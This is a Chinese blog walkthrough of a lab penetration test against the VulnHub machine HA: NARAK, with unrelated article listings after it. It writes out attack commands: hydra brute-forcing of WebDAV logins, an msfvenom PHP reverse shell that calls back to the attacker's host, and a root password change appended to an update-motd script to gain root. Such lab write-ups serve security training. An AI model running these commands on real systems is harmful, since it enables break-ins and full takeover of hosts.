HA NARAK渗透测试

原创 已于 2023-07-29 22:36:34 修改 · 367 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2023-07-29 22:29:06 首次发布

HA: NARAK靶场渗透测试

文章目录


image-20230729135340478

0x01 环境

image-20230729135708286

  • 攻击机:kali2023.4
  • 环境:VMware
  • 网络:NAT

0x02 信息收集

  • 查看本机网络信息(攻击机)
┌──(kali㉿kali)-[~]
└─$ ifconfig            
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.48.130  netmask 255.255.255.0  broadcast 192.168.48.255
        inet6 fe80::f2d9:5916:50bf:76a9  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:95:c9:f6  txqueuelen 1000  (Ethernet)
        RX packets 18061  bytes 12035305 (11.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 15137  bytes 1681658 (1.6 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
  • nmap对c段网络进行扫描
nmap 192.168.48.0/24

发现192.168.48.133主机,开放端口:22,80

image-20230729141217432

http服务是开放的,进去看看

image-20230729164732242

  • 目录爆破

    dirb http:192.168.48.133

image-20230729164910107

获得一个webdav目录,然后需要账号密码登录,于是使用cewl 来生成一个账号和密码的字典

  • cewl 爬取网站关键字生成字典
cewl 192.168.48.133 -w narak.txt

image-20230729165047637

0x03 密码爆破

  • 使用hydra对webdav的账号密码进行爆破,利用刚刚得到的字典
hydra -L narak.txt -P narak.txt 192.168.48.133 http-get /webdav

image-20230729165323302
获得一对密钥:yamdoot:Swarg

  • 使用cadver(继续linux终端的webdav交互客户端)进行登录
cadaver http://192.168.48.133/webdav

image-20230729165350258

  • 使用msfvenom生成基于php的反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.48.130 lport=5555 -o shell.php

image-20230729165431788
然后用cadaver的put命令上传
image-20230729165559855

  • 使用msf中的监听,设置payload lhost lport之后开启监听

image-20230729165851629
然后在网页中打开http://192.168.48.133/webdav/shell.php以执行php

image-20230729165936551
可以看到连接成功

0x04 shell反弹连接获取user.txt

  • 链接成功后用下面的命令改善回显
python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20230729170137659

反弹的用户为www用户,在/home/inferno/user.txt中获取到flag1

image-20230729170429381
试图通过命令直接找root.txt没找到
image-20230729170530164

  • 使用find命令搜索:从根目录开始搜索任何用户都可以写的文件有哪些
find / -type f -perm -ug=x,o=w 2>/dev/null

找到一个可疑的/mnt/hell.sh
image-20230729171020824
cat hell.sh发现里面的内容是密文,经过了解,这是brainfuck加密方式,并且发现任何用户都可以对update-motd.d下的文件写操作

  • brainfuck解码
    image-20230729170930861

image-20230729171122715

解得一个明文:chitragupt,猜测是某个用户的密码,因为前面的update-motd.d下的文件是需要ssh用户登录之后才会以root权限执行,所以提示应该是一个用户的密码,并且要用ssh登录,后面经过尝试,是inferno的密码

0x05 update-motd.d可写漏洞,提权获取root.txt

登录inferno用户
image-20230729172840991

看一下有什么权限,没什么收货
image-20230729172918385

  • 对00-header下手
    image-20230729172959175
echo 'echo "root:123456" | sudo chpasswd' >>/etc/update-motd.d/00-header
#在00-header文件后面追加写入更改root密码的命令

查看是否追加成功,有2行是因为之前有测试过一次
image-20230729173402109

update-motd介绍:就是说任何用户ssh登录时,都会以root权限执行欢迎脚本

image-20230729162914405

  • 重新ssh登录,以执行藏在欢迎脚本中的更改密码脚本

image-20230729173653863

su root并用123456密码登录成功,提权成功

  • 获取flag2:root.txt
    image-20230729164517256
Jianmuhtb
关注
VulnHub靶场之HA: NARAK
A_dmin的博客
10-01 1789
VulnHub靶场之HA: NARAK 一开始扫描存活主机ip: 执行命令:nmap -sV -p 1-65535 192.168.198.148 先查看80端口,是一个网页: 目录扫描: 发现存在一个401的登陆页面,利用cewl生成字典: 利用hydra对其进行爆破,hydra -L woldlist.txt -P woldlist.txt 192.168.198.148 http-get /webdav 得到账号密码yamdoot:Swarg: 成功进入: 后面没有思路了,,,emmmm
靶机渗透测试HA: NARAK
@小张小张的博客
10-24 3202
靶机渗透测试HA: NARAK): Vulnhub靶机 HA: NARAK 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(Easy–Intermediate) 目标:Boot to Root .Your target is gain the Root access 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令: netdiscover -i eth0 -r 192.168.10.0
VulnHub渗透测试实战靶场-HANARAK
LYJ20010728的博客
08-20 985
VulnHub渗透测试实战靶场-HANARAK环境下载HANARAK靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 HANARAK靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.140 使用 nmap 扫描开放的端口:sudo nmap -sU -Pn 192.168.
VulnHub靶场HA: NARAK练习 - 修改00-header文件进行提权
qq_43232893的博客
10-15 709
VulnHub靶场HA: NARAK练习简介开始 简介 攻击机ip:192.168.255.139 靶机ip: 192.168.255.142 靶机下载地址: 开始 使用nmap找到靶机地址并扫描端口 找到靶机ip,使用nmap -sV -Pn -p- -v 192.168.255.142进行端口扫描 发现开启了个80跟22端口,访问一下80端口: 什么都没有,再看看有没有敏感目录 发现了一个401登录界面 利用cewl生成字典 cewl 192.168.255.142 -w 1.txt 再使
Vulnhub靶场随笔HA:Narak
weixin_59005129的博客
10-23 162
咱们提权还有一个方法,老生常谈了属于是 内核漏洞提权CVE-2021-3493 /etc/update-motd.d/00-header
narak靶场渗透测试
qq_41567985的博客
11-09 262
Nmap -sU ip 扫到一个udp的63 tftp协议,连接之后就可以拿到关键信息了,我觉得这样才是一个正确的打靶思路,纯粹的暴力破解虽然能行,但是感觉有点鲁莽了。向00-header中写入echo 'root:admin'|sudo chpasswd。tips.txt 提示我们通往narak的门的线索可以在creds.txt找到。webdav是一个服务,kali自带了一个webdav的漏洞利用工具。2023年11月8日 晚上19:00晚上20:30。这里涉及到一个知识点,这里是我查到的,叫做。
Vulnhub靶场渗透-narak
paidx0
09-19 1137
前言 靶机IP(192.168.110.131) 攻击机IP(192.168.110.127) 网络连接NAT模式 不多说直接开始吧 信息收集 还是常规的先扫端口和目录 先访问网页看看都有些什么,扫到的目录也打开看看 主页没啥东西全都是图片,注意到webdav可以打开,但需要连接的账号密码 所以现在的思路就是可能需要通过 webdav来上传文件,再访问拿到webshell 漏洞挖掘 现在考虑通过爆破的方式去登录 webdav,但是爆破需要一个好用的字典 这里可以用 cewl 来制作字典 cew
[VulnHub靶机渗透] HA: Narak
人若无名,便可专心练剑
02-22 1731
学渗透必打百台靶机实操精讲-Narak。涉及UDP突破,TFTP信息泄漏,webdav反弹shell上传。二级提权,第一级通过找到可写bash脚本文件中的brainfuck语句,获得凭据,二级通过motd脚本获得root权限。相比之前的视频,增加了些新知识,值得玩味的攻击链。可以结合靶机实操。
Vulnhub-HA-NARAK靶机测试
qq_46015509的博客
04-24 2809
Vulnhub-HA-NARAK 靶机渗透
靶机渗透之narak
weixin_64267091的博客
02-04 1355
在这次靶机渗透过程中,走到漏洞分析阶段路就断了,发现在信息收集部分可能遗漏掉一些重要信息,最后又重点扫描了一些常见的UDP端口,最后扫出来了一个69端口。然后就利用这个服务找到了一个用户名及其密码,成功访问webdav。然后使用davtest测试webdav可以上传和执行哪些文件,发现可以上传并执行php,利用cadaver客户端上传反弹shell的php文件并访问shell.php,然后通过寻找敏感文件初步提权,找到brainfuck代码,用beef工具解码,发现了用户名inferno的ssh密码。
Vulnhub靶机:HA_ NARAK
LainWith的博客
08-03 823
HA(此系列共17台)发布日期:2020年9月23日难度: 中目标: 取得 root 权限 + 2 Flag注释: 使用爆破,使用vmware虚拟机运行主机发现端口扫描信息收集密码字典定制爆破密码webdav漏洞PUT方法上传BF语言解码MOTD注入CVE-2021-3493提权。...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8834
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
学递来啦高校快递末端物流配送需求对接众包服务平台项目_高校学生快递代取互助资源共享社区生态体系_面向当代大学生解决校园内快递包裹最后一公里配送难题通过众包模式实现需求发布与接单构建.zip
12-04
学递来啦高校快递末端物流配送需求对接众包服务平台项目_高校学生快递代取互助资源共享社区生态体系_面向当代大学生解决校园内快递包裹最后一公里配送难题通过众包模式实现需求发布与接单构建.zip
【四杆机构分析】根据给定的系统几何参数执行四杆机构分析研究(Matlab代码实现)
12-04
内容概要:本文档围绕“四杆机构分析”展开,介绍了一种基于给定系统几何参数执行四杆机构运动学分析的研究方法,并提供了完整的Matlab代码实现。四杆机构作为机械系统中的经典【四杆机构分析】根据给定的系统几何参数执行四杆机构分析研究(Matlab代码实现)连杆机构,其运动特性分析在自动化、机器人、车辆工程等领域具有重要应用价值。文档内容涵盖机构的位置、速度和加速度分析,通过矢量闭环法建立数学模型,利用Matlab进行数值计算与可视化仿真,帮助用户理解机构的运动规律。此外,文档还展示了代码的模块化结构,便于扩展至其他连杆机构分析。; 适合人群:具备一定Matlab编程基础和机械原理知识的本科高年级学生、研究生及从事机械系统仿真与设计的工程技术人员。; 使用场景及目标:①掌握四杆机构的运动学建模方法;②学习如何使用Matlab实现机构的位姿分析与动态仿真;③为后续复杂机构设计与机器人运动学研究打下基础;④适用于课程设计、科研项目或工程验证中的机构分析任务。; 阅读建议:建议读者结合机械原理教材中的四杆机构理论,逐步调试Matlab代码,观察各参数变化对机构运动的影响,并尝试修改几何参数或扩展至多连杆系统,以加深对运动学分析的理解。
这是一个从零开始独立构建的现代化前端项目它诞生于2022年旨在通过一个完整可运行的应用实例为前端开发初学者与进阶者提供一个绝佳的学习范本与二次开发基础_该项目深入实践了原生.zip
最新发布
12-04
这是一个从零开始独立构建的现代化前端项目它诞生于2022年旨在通过一个完整可运行的应用实例为前端开发初学者与进阶者提供一个绝佳的学习范本与二次开发基础_该项目深入实践了原生.zip
采用GPS、里程计和电子罗盘作为定位传感器,EKF作为多传感器的融合算法,最终输出目标的滤波位置(Matlab代码实现)
12-04
内容概要:本文介绍了一个基于多传感器融合的定位系统设计方案,采用GPS、里程计和电子罗盘作为定位传感器,利用扩展卡尔曼滤波(EKF)算法对多源传感器数据进行融合处理,最终输出目标的滤波后位置信息,并提供了完整的Matlab代码实现。该方法有效提升了定位精度与稳定性,尤其适用于存在单一传感器误差或信号丢失的复杂环境,如自动驾驶、移动采用GPS、里程计和电子罗盘作为定位传感器,EKF作为多传感器的融合算法,最终输出目标的滤波位置(Matlab代码实现)机器人导航等领域。文中详细阐述了各传感器的数据建模方式、状态转移与观测方程构建,以及EKF算法的具体实现步骤,具有较强的工程实践价值。; 适合人群:具备一定Matlab编程基础,熟悉传感器原理和滤波算法的高校研究生、科研人员及从事自动驾驶、机器人导航等相关领域的工程技术人员。; 使用场景及目标:①学习和掌握多传感器融合的基本理论与实现方法;②应用于移动机器人、无人车、无人机等系统的高精度定位与导航开发;③作为EKF算法在实际工程中应用的教学案例或项目参考; 阅读建议:建议读者结合Matlab代码逐行理解算法实现过程,重点关注状态预测与观测更新模块的设计逻辑,可尝试引入真实传感器数据或仿真噪声环境以验证算法鲁棒性,并进一步拓展至UKF、PF等更高级滤波算法的研究与对比。
智能汽车基于BEV+Transformer的传感器融合架构:多模态感知系统设计与数据闭环优化
12-04
内容概要:文章围绕智能汽车新一代传感器的发展趋势,重点阐述了BEV(鸟瞰图视角)端到端感知融合架构如何成为智能驾驶感知系统的新范式。传统后融合与前融合方案因信息丢失或算力需求过高难以满足高阶智驾需求,而基于Transformer的BEV融合方案通过统一坐标系下的多源传感器特征融合,在保证感知精度的同时兼顾算力可行性,显著提升复杂场景下的鲁棒性与系统可靠性。此外,文章指出BEV模型落地面临大算力依赖与高数据成本的挑战,提出“数据采集-模型训练-算法迭代-数据反哺”的高效数据闭环体系,通过自动化标注与长尾数据反馈实现算法持续进化,降低对人工标注的依赖,提升数据利用效率。典型企业案例进一步验证了该路径的技术可行性与经济价值。; 适合人群:从事汽车电子、智能驾驶感知算法研发的工程师,以及关注自动驾驶技术趋势的产品经理和技术管理者;具备一定自动驾驶基础知识,希望深入了解BEV架构与数据闭环机制的专业人士。; 使用场景及目标:①理解BEV+Transformer为何成为当前感知融合的主流技术路线;②掌握数据闭环在BEV模型迭代中的关键作用及其工程实现逻辑;③为智能驾驶系统架构设计、传感器选型与算法优化提供决策参考; 阅读建议:本文侧重技术趋势分析与系统级思考,建议结合实际项目背景阅读,重点关注BEV融合逻辑与数据闭环构建方法,并可延伸研究相关企业在舱泊一体等场景的应用实践。
MATLAB基于3D FDTD的微带线馈矩形天线分析[用于模拟超宽带脉冲通过线馈矩形天线的传播,以计算微带结构的回波损耗参数]
12-04
内容概要:本文档主要介绍了一个基于3D FDTD(时域有限差分)方法的MATLAB仿真研究,用于分析微带线馈电的矩形天线在超宽带脉冲传播下的电磁特性,重点计算微带结构MATLAB基于3D FDTD的微带线馈矩形天线分析[用于模拟超宽带脉冲通过线馈矩形天线的传播,以计算微带结构的回波损耗参数]的回波损耗参数。该方法通过数值模拟精确求解麦克斯韦方程组,适用于高频电磁场仿真,能够有效评估天线的匹配性能与宽带特性。文档还列举了多个相关科研方向和技术应用案例,涵盖通信、信号处理、电力系统、路径规划等多个领域,展示了MATLAB在科研仿真中的广泛用途。; 适合人群:具备电磁场与微波技术基础知识,熟悉MATLAB编程,从事天线设计、射频工程或计算电磁学研究的研究生、科研人员及工程师。; 使用场景及目标:①掌握3D FDTD算法的基本原理及其在天线仿真中的实现方法;②学习如何利用MATLAB构建微带天线模型并分析其回波损耗特性;③为超宽带天线设计与优化提供仿真依据和技术支持; 阅读建议:建议读者结合电磁理论基础,逐步理解FDTD离散化过程和边界条件设置,重点关注代码中网格划分、激励源设置、吸收边界条件(如PML)及结果后处理部分,并可通过调整结构参数进行仿真验证与性能优化。
基于PhasorDetect手持NIRS设备多光谱反射数据的组织氧饱和度实时监测研究(Matlab代码实现)
12-04
内容概要:本文围绕基于PhasorDetect手持NIRS设备的多光谱反射数据,开展组织氧饱和度的实时监测研究,并提供了完整的Matlab代码实现方案。基于PhasorDetect手持NIRS设备多光谱反射数据的组织氧饱和度实时监测研究(Matlab代码实现)研究内容涵盖近红外光谱技术的基本原理、多光谱数据采集方法、组织氧饱和度的计算模型以及实时监测系统的构建。通过Matlab对采集到的反射光谱数据进行预处理、特征提取与分析,结合光吸收特性与生物组织模型,实现了对人体组织血氧水平的动态估算与可视化监控。该方法具有非侵入性、便携性和实时性强的优点,适用于临床监护、运动生理监测等场景。; 适合人群:具备一定信号处理和生物医学工程背景,熟悉Matlab编程,从事医疗设备开发、生理参数监测或相关领域研究的研发人员及研究生。; 使用场景及目标:①实现基于NIRS技术的组织氧饱和度实时监测系统开发;②掌握多光谱数据处理与生理参数反演的完整流程;③为便携式医疗设备的设计与验证提供技术支持与算法参考。; 阅读建议:建议结合Matlab代码逐模块调试运行,理解数据预处理、模型构建与结果可视化的具体实现步骤,同时可扩展应用于其他生理参数监测项目中以提升实战能力。
(55页PPT)PP某省市应急平台建设方案.pptx
12-04
(55页PPT)PP某省市应急平台建设方案.pptx
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值